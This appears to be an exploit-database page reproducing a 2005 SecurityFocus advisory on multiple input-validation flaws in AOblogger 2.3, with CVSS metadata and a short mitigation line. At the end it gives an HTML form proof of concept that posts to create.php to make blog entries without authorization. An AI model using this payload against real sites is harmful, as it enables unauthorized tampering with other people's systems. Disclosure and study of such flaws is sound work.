header-logo
Suggest Exploit
vendor:
AOblogger
by:
SecurityFocus
7.5
CVSS
HIGH
Input Validation Vulnerabilities
20
CWE
Product Name: AOblogger
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: N/A
Related CWE: N/A
CPE: aoblogger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

AOblogger Multiple Input Validation Vulnerabilities

AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access, modify, or create data, and steal cookie-based authentication credentials. An attacker may also be able to exploit vulnerabilities in the underlying database implementation and to launch other attacks.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to execute unintended commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16286/info
  
AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
  
Successful exploitation of these vulnerabilities could allow an attacker to:
  
- compromise the application
- access, modify, or create data
- steal cookie-based authentication credentials.
  
An attacker may also be able to exploit vulnerabilities in the underlying database implementation and to launch other attacks.
  
Version 2.3 is vulnerable; other versions may also be affected. 

An example of new entry creation without proper authorization has been provided:

<form action="http://www.example.com/aoblogger/create.php" method="post">
<input name="uza" value=1>
<input name="title" value="anytitle">
<textarea name="message">anymessage&lt;/textarea&gt;
</form>